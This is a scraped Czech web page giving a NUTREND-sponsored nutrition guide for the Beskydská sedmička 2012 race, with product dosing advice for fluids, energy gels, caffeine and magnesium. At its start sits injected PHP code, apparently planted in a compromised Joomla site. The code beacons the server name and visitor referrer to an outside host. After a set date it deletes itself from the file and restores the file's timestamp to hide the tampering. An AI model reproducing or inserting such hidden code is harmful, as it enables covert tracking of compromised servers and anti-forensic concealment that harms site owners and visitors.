check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735874){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } PRŮVODCE VÝŽIVOU PRO BESKYDSKOU SEDMIČKU 2012
           
www.continental.cz
PRŮVODCE VÝŽIVOU PRO BESKYDSKOU SEDMIČKU 2012

Základní zásady pro váš závod: (celý článek si můžete stáhnout zde)

1. TEKUTINY

Pravidelně doplňujte v průběhu celého závodu tekutiny. Doporučujeme hypotonické ředění sportovního nápoje ISODRINX (35 g – jedna odměrka - do cca 800 - 1000 ml čisté vody). Lze jej zalít i teplou vodou – prohřeje organismus a zabrání nebezpečné dehydrataci.

Sportovní nápoj můžete střídat s teplým čajem – doporučujeme osladit medem a přidat citrón pro osvěžení.

Pijte pravidelně, každých 15 - 20 minut závodu. Více o produktu ISODRINX naleznete zde



2. ENERGIE

Pokud chcete vydržet celý závod, potřebujete dostatečný přísun energie. Je efektivnější energetické krizi předcházet, než ji následně řešit. Doplňky výživy od společnosti NUTREND vám budou výborným parťákem na celý závod, ale vždy byste je měli kombinovat s běžnou stravou jako je ovoce, pečivo či teplá polévka.

Každou hodinu závodu byste měli přijmout 30 – 60 g sacharidů.

Ideální je použít v první polovině závodu každou hodinu ½ energetického gelu ENDUROSNACK. Gel je vhodné kombinovat s půlhodinovým odstupem např. s pečivem či ovocem nebo polévkou. Pokud preferujete místo gelů tyčinku, pak gel můžete nahradit tyčinkou POWER BIKE BAR.

S přibývající únavou a kilometry nezapomínejte i na jídlo které vás zasytí. Hlaďák může být velkým nepřítelem. Hlad zažene tyčinka VOLTAGE ENERGY CAKE nebo WELLNESS OATS CAKE. Tyčinky můžete opět kombinovat s běžnou stravou.

V polovině závodu můžete pro povzbuzení těla a mysli použít stimulant SHLEHA. Produkt, který je složen rostlinných extraktů obsahuje celkem 140 mg kofeinu. SHLEHu můžete opět využít i ve finální fázi závodu, kdy budete potřebovat dodat energii do závěrečných kilometrů.

TIP PRO ŘEŠENÍ ENERGETICKÉ KRIZE

Přes všechny přípravy a pravidelnou stravu se může stát, že vás únava dožene. Pro rychlé vyřešení energetické krize můžete použít gel CARBOSNACK. Doporučujeme jej ale použít až v druhé polovině závodu. A vždy jej kombinujte s běžnou stravou, ať po rychlém nabuzení nepřijde opět rychlý útlum.

TIP PRO ŘEŠENÍ SVALOVÝCH KŘEČÍ

Aby vás svalové křeče nepřekvapily v průběhu závodu, je potřeba dodržovat několik zásad. Od dostatečné hydratace, přes pravidelný přísun energie a minerálů. Přes všechnu snahu se ale svalové křeče s přibývající únavou mohou objevit, proto doporučujeme mít připravený MAGNESLIFE, vysoce efektivní roztok hořčíku s vitaminem B6.


3. REGENERACE

Po skončení závodu nepodceňujte nastartování regenerace. Zaměřte se na dostatečný přísun vitaminů a minerálů a kvalitních sacharidů. Vyzkoušet můžete např. REGENER nebo tyčinku REGENER bar, které vám pomohou urychlit regeneraci. Večer před spaním vypijte i dávku MAGNESLIFE, tekutý roztok hořčíku s vitaminem B6 uvolní svalové napětí.










Více informací o produktech se dozvíte na webových stránkách www.nutrend.cz nebo osobně při prezentaci závodu na stánku NUTREND, kde pro vás budou produkty za zvýhodněnou cenu.